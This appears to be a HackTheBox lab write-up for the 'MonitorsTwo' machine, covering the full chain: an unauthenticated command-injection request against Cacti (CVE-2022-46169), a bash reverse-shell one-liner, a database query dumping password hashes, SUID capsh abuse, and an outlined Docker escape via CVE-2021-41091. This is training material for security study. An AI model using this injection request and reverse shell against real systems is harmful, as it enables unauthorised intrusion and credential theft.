HackTheBox — MointorsTwo

ARZ101
4 min readSep 1, 2023

Monitors Two involved exploiting cacti which was vulnerable to un-aunthenticated remote code execution (CVE-2022–46169) which returns a shell as www-data in a docker container, escalating privileges to root through capsh on the container and then getting root on the host by abusing CVE-2021-41091, which is a flaw in docker engine allowing users to execute files from docker images.

NMAP

Nmap scan report for 10.10.11.211
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Trying the default creds for catci admin:adminand admin:cactipw which didn't work

On searching for vulnerabilities related to cacti 1.2.22, there’s an un-aunthenticated rce ( CVE-2022–46169)

Foothold

We can reproduce this by just using the GET request to get a hit on our webserver to confirm that it’s working

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+10.10.14.142` HTTP/1.1
Host: 10.10.11.211
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Cacti=b7c2b58f33ea788f827a4d4bbe435deb; CactiDateTime=Thu May 04 2023 20:36:02 GMT+0500; CactiTimeZone=300
Upgrade-Insecure-Requests: 1

We can get a reverse shell using bash payload

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.142/2222 0>&1"

Checking the hostname reveals that we are in a docker container

Privilege Escalation (marcus)

Reading the entrypoint.sh file, we can find the mysql creds which are root:root

From here querying the users from user_auth table

mysql --host=db --user=root --password=root -e "use cacti;show tables; select * from user_auth;"

Cracking these two hashes out of which we’ll get marcus’s hash cracked

Reading the mail from /var/mail/marcus

From the mail it talks about there CVEs for which CVE-2021-41091 stands out as the docker version on this machine is 20.10.5

There’s a really nice article on how to abuse this and the short summary is this, we need to have bash or any binary that may spawn bash as root user and then from the host machine, access the overlay filesystem of that docker container and execute the binary will grant us root privileges on the host

Since we are not root on the actual host we can’t just spawn bash into the container and make bash a SUID, running linpeas on the docker container, capsh has SUID bit set which means we can spawn bash as a root user

After doing this, run findmnt to find the docker container's filesystem

References

--

--